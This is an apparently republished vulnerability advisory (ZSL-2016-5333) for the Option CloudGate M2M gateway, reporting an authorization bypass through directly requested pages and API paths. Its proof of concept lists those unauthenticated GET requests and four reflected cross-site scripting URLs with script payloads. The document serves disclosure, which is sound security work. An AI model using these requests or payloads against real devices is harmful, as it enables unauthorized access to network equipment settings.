Option CloudGate Insecure Direct Object References Authorization Bypass

2016.06.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Option CloudGate Insecure Direct Object References Authorization Bypass Vendor: Option NV Product web page: http://www.option.com Affected version: CG0192-11897 Summary: The CloudGate M2M gateway from Option provides competitively priced LAN to WWAN routing and GPS functionality in a single basic unit certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+). The CloudGate is simple to configure locally or remotely from your PC, tablet or Smartphone. Desc: Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system directly, for example APIs, files, upload utilities, device settings, etc. Tested on: lighttpd 1.4.39 firmware 2.62.4 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5333 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php 11.06.2016 -- GET /partials/firewall.html GET /partials/system.html GET /partials/ipsec.html GET /partials/provisioning.html GET /api/login GET /api/replacementui GET /api/goatgates OR /#/firewall /#/system /#/ipsec /#/provisioning XSS: http://127.0.0.2/api/replacementui<script>alert(1)</script> http://127.0.0.2/api/goatgates<script>alert(2)</script> http://127.0.0.2/api/Blah-Blah<script>alert(3)</script> http://127.0.0.2/api/<script>alert(4)</script>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top